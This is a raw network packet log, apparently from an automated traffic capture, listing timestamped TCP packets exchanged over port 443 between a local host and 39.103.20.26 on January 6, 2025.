                                                  Jan 6, 2025 04:50:45.646151066 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.648371935 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.648406982 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.648433924 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.648437977 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.648464918 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.648488998 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.650682926 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.650723934 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.650746107 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.650748968 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.650760889 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.650787115 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.654253960 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.654277086 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.654303074 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.654309988 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.654321909 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.654344082 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.674650908 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.674710035 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.674799919 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.674844027 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.680229902 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.680279016 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.680284023 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.680298090 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.680337906 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.686048031 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.686090946 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.686115980 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.686120987 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.686148882 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.686167002 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.691541910 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.691606998 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.691692114 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.691742897 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.695593119 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.695652008 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.695724964 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.695775986 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.701476097 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.701514006 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.701550007 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.701555014 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.701564074 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.701591015 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.707108021 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.707171917 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.707200050 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.707243919 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.712779045 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.712852001 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.712863922 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.712919950 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.718760014 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.718822956 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.718956947 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.719007015 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.721376896 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.721417904 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.721434116 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.721488953 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.724754095 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.724802017 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.724812031 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.724817038 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.724843979 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.724858999 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.728050947 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.728099108 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.728142023 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.728192091 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.732765913 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.732816935 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.943329096 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.943381071 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.982320070 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.982332945 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.982392073 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:46.068121910 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:46.068129063 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.068137884 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.068192005 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:46.068196058 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.068239927 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:46.068243027 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.068267107 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:46.068269968 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.068278074 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.068311930 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:46.068315983 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.068347931 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:46.068351030 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.068387985 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:46.068391085 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.068423033 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:46.068425894 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.068444014 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.068455935 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:46.068459988 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.068496943 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:46.068506002 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.068512917 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.068531990 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:46.068536043 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.068572044 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:46.068577051 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.068609953 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:46.068617105 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.068644047 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:46.068646908 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.068653107 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.068681955 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:46.068685055 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.068722963 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:46.068727016 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.068763018 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:46.068766117 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.068804026 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:46.068837881 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:46.068849087 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.068897009 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:46.279335022 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.279526949 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:46.719335079 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:46.721824884 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.224311113 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.224325895 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.224337101 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.224416971 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.224416971 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.224425077 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.224435091 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.224443913 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.224482059 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.224487066 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.224535942 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.224540949 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.224596977 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.224600077 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.224651098 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.224653959 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.224694014 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.224699020 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.224708080 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.224721909 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.224757910 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.224761963 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.224778891 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.224782944 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.224812984 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.224818945 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.224864960 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.224869013 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.224879980 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.224905014 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.224910975 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.224910975 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.224915028 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.224989891 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.224989891 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.384401083 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.384414911 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.384471893 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.407749891 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.407762051 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.407783031 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.407789946 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.407963991 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.407970905 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.407984018 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.407995939 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.408046007 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.408051014 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.408149958 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.408154964 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.408178091 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.408183098 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.408256054 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.597731113 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.597749949 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.597819090 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.624830008 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.624844074 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.624860048 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.624862909 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.625042915 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.625050068 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.625062943 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.625078917 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.625085115 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.625088930 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.625147104 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.625154018 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.625235081 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.625289917 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.625296116 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.625345945 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.828445911 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.828458071 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.828479052 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.828491926 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.828628063 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.828634024 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.828643084 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.828659058 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.828665018 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.828670025 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.828730106 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.828735113 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.828819036 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.828824997 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:47.828859091 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:47.828883886 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.035335064 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.035882950 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.068447113 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.068459034 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.068469048 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.068552017 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.068557024 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.068567038 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.068639040 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.068643093 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.068650961 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.068674088 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.068703890 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.142914057 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.142925978 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.142940044 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.142946005 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.143163919 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.143170118 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.143182993 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.143187046 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.143271923 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.143275976 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.143388987 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.143399954 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.143477917 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.351334095 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.351381063 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.363524914 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.363532066 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.363543034 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.363552094 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.363647938 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.363656044 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.363707066 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.443331957 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.443345070 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.443360090 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.443367004 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.443511009 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.443517923 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.443535089 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.443547010 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.443562031 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.443566084 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.443644047 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.443654060 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.443696976 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.443737030 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.655328035 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.655436993 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.705259085 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.705286980 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.705301046 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.705311060 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.705441952 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.705449104 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.705503941 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.784284115 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.784298897 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.784316063 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.784324884 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.784563065 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.784569979 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.784580946 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.784595013 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.784600973 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.784655094 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.784743071 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.784748077 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.784837008 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:48.995328903 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:48.995381117 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:49.092464924 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:49.092478037 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:49.092494965 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:49.092503071 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:49.092593908 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:49.092600107 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:49.092647076 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:49.191447020 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:49.191490889 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:49.191543102 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:49.191574097 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:49.191662073 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:49.191684008 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:49.191705942 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:49.191770077 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:49.191771030 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:49.191787958 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:49.191817999 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:49.191863060 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:49.191900015 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:49.191934109 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:49.399328947 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:49.399386883 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:49.479285002 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:49.479300976 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:49.479320049 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:49.479446888 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:49.614610910 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:49.614629030 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:49.614723921 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:49.943067074 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:49.995784044 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:50.575052977 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:50.575083971 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:50.762929916 CET49988443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:50.762983084 CET4434998839.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:50.763108015 CET49988443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:50.763335943 CET49988443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:50.763346910 CET4434998839.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:52.072372913 CET4434998839.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:52.072482109 CET49988443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:52.073071003 CET49988443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:52.073081017 CET4434998839.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:52.073303938 CET49988443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:52.073311090 CET4434998839.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:52.404304981 CET4434998839.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:52.404333115 CET4434998839.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:52.404459000 CET49988443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:52.404474974 CET4434998839.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:52.404546976 CET49988443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:52.404640913 CET4434998839.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:52.404700041 CET49988443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:52.405473948 CET4434998839.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:52.405513048 CET4434998839.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:52.405540943 CET49988443192.168.2.639.103.20.26
